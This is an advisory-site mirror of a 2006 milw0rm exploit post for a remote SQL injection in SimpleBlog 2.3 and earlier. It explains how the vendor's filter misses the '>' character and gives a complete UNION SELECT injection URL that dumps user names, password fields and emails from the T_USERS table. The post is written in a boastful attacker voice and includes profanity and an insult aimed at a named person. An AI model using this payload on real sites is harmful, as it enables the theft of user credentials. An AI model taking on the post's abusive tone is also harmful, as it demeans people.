Computer Security

Security Advisory: SimpleBlog <= 2.3 (id) Remote SQL Injection Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  The Amazing Little Poll Admin Pwd

  [SA21653] PHP-Nuke MyHeadlines Module "myh_op" Cross-Site Scripting

  [SA21742] microforum "members.
dat" Exposure of User Credentials

  in-link <=2.3.4 (adodb-postgres7.
inc.php) Remote File Inclusion Exploit

From:MILW0RM <submit_(at)_milw0rm.com>
Date:04.09.2006
Subject:SimpleBlog <= 2.3 (id) Remote SQL Injection Vulnerability

                                          _           _        
                                   __   _(_)_ __  ___| |_ __ _
                                   \ \ / / | '_ \/ __| __/ _` |
                                    \ V /| | |_) \__ \ || (_| |
                                     \_/ |_| .__/|___/\__\__,_|
                                         |_| AnD
                              _               _    _ _ _     
                      _ __ ___  _   _ _ __ __| | ___ _ __ ___| | _(_) | |____
                     | '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_  /
                     | | | | | | |_| | | | (_| |  __/ |  \__ \   <| | | |/ /
                     |_| |_| |_|\__,_|_|  \__,_|\___|_|  |___/_|\_\_|_|_/___|

+-----------------------------------------------------------------+
| Vipsta & MurderSkillz fucking pwnt this webApp                  |
+-----------------------------------------------------------------+
| App Name: SimpleBlog 2.3  |
| App Author: 8pixel.net  |
| App Version: <= 2.3  |
| App Type: Blog/Journal  |
+-----------------------------------------------------------------+
| DETAILS  |
+-----------------------------------------------------------------+
| Vulnerability: Remote SQL Injection  |
| Requirements: Database with UNION support  |
| Revisions: Note - This is a revision of another vuln          |
|            posted by Chironex Fleckeri  |
+-----------------------------------------------------------------+
| CODE  |
+-----------------------------------------------------------------+
| Vendor "implemented" a fix for SQL injection vulnerabilities.   |
| however this bullshit was easily worked around by  |
| Vipsta & MurderSkillz.  |
|  |
| Vendor attempted to remove illegal characters like ' and =      |
| which stop most SQL injection vulnerabilities. However:  |
| Vendor failed to remove '>' symbol.  |
+-----------------------------------------------------------------+
| EXPLOIT  |
+-----------------------------------------------------------------+
| SQL Injection String:  |
+--------------------------------------------------------------------------------
---------------------------------------------------------------------------------
------------+
| http://[target]/[path]/default.asp?view=plink&id=-
1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,
uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1  |
+--------------------------------------------------------------------------------
---------------------------------------------------------------------------------
------------+
| TIMELINE  |
+-----------------------------------------------------------------+
| 9/2/06 - Vendor Notified.  |
| 9/2/06 - Vendor Replied. Threatens legal action.  |
| 9/4/06 - Exploit Released with no details to vendor.            |
+-----------------------------------------------------------------+
| SHOUTZ  |
+-----------------------------------------------------------------+
| Everyone at g00ns.net - including:  |
| z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo,  |
| TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot,  |
| JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be,  |
| ReysRaged, milf <3, gio, RedCoat, and all who I forgot!   |
+-----------------------------------------------------------------+
| ADDITIONAL NOTES  |
+-----------------------------------------------------------------+
| TeamSpeak: ts.g00ns.net  |
| IRC: irc.g00ns.net  |
+-----------------------------------------------------------------+
| PERSONAL STUFF  |
+-----------------------------------------------------------------+
| Sess from g00ns.net IS A FUCKING MORON.                         |
+-----------------------------------------------------------------+

                                            __
                                 ___  ___  / _|
                                / _ \/ _ \| |_
                               |  __/ (_) |  _|
                                \___|\___/|_|.

# milw0rm.com [2006-09-04]

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod
 


Rating@Mail.ru